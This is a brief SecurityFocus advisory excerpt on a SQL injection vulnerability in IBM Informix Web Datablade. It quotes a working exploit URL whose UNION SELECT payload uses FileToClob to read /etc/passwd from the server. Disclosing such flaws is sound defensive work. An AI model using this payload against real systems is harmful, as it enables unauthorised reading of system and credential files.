IBM Informix Web Datablade Page Request SQL Injection Vulnerability

A number of exploits are provided in the advisory released by Simon Lodal <simonl@mirrormind.com>, including the following which will display /etc/passwd:

http://victim.com/site/' UNION ALL SELECT FileToClob('/etc/passwd','server')::html,0 FROM sysusers WHERE username = USER --/.html


 

Privacy Statement
Copyright 2010, SecurityFocus